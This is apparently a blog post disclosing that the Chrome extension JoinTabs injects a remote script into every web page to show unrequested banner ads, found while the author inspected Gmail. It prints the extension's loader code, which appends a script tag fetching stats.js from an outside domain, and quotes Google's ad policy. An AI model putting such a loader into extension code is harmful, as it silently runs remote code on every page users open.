While working on a website, I noticed a strange amount of whitespace at the bottom of the page. Using the web inspector, I discovered it was an iframe attempting to display an advertisement from a domain I had never heard of.

Panic started to set in. There are definitely no ads on this site.

I then switched over to the tab where I had Gmail open and saw this in the inspector:

[blocked] The page at https://mail.google.com/mail/u/0/#inbox ran insecure content from http://www.v-tool.com/jointabs/stats.js.

Oh fuck.

I don’t use many Chrome extensions, but one that I’ve found helpful is a stupidly simple extension called JoinTabs created by Luca Grementieri at an Italian company called “Java Factory”. It adds a button to the Chrome toolbar that automatically combines tabs from every open window into one.

Clearly it was doing a bit more than advertised.

Looking at the source code, I found this in a file called shortcut.js:

var stats_tag = document.createElement('script');
stats_tag.type = 'text/javascript';
stats_tag.src = 'http://www.v-tool.com/jointabs/stats.js';
document.getElementsByTagName("head")[0].appendChild(stats_tag);

This file shotcut.js is listed in manifest.json under content_scripts. This means that the above code is run inside the content of every single web page. Had the authors of this extension used an https:// URL for the stats.js file, Chrome would not have blocked it from loading inside Gmail.

The stats.js file basically appends an <iframe> to the current page containing either http://www.games-free-apps.com/games/a.html or http://www.games-free-apps.com/games/b.html, which in turn display banner ads from a sketchy ad network. The reason I only saw whitespace is because I also have an ad blocking extension.

Although it appears the malicious code only displayed advertisements, who knows what it did in the past? It could have easily walked off with passwords, cookies, or other sensitive data.

How long has this been going on? Hard to say. Chrome extensions update automatically in the background, and as far as I can tell previous versions are not kept around. According to the file modification times, the extension last auto-updated on September 21st. Previous versions could have still contained malicious code, of course.

The extension has mysteriously disappeared from the Chrome Web Store. I’m not sure what this means… if Google became aware that the extension is malicious, would they not attempt to notify users? Do they have any way to remotely disable the extension?

Looking at a cache of the web store page, the extension has over 24,000 users. According to the author’s website, the extension was also once even “Featured” by Google, though I don’t know how to verify this.

A few months ago, Google announced a policy change allowing Chrome extensions to display advertisements. It says:

You may show ads alongside a third-party website only if all of the following criteria are met:

• This behavior is clearly disclosed to the user.
• There is clear attribution of the ads’ source wherever those ads appear.
• The ads do not interfere with any native ads or functionality of the website.

In other words, “please don’t be evil”.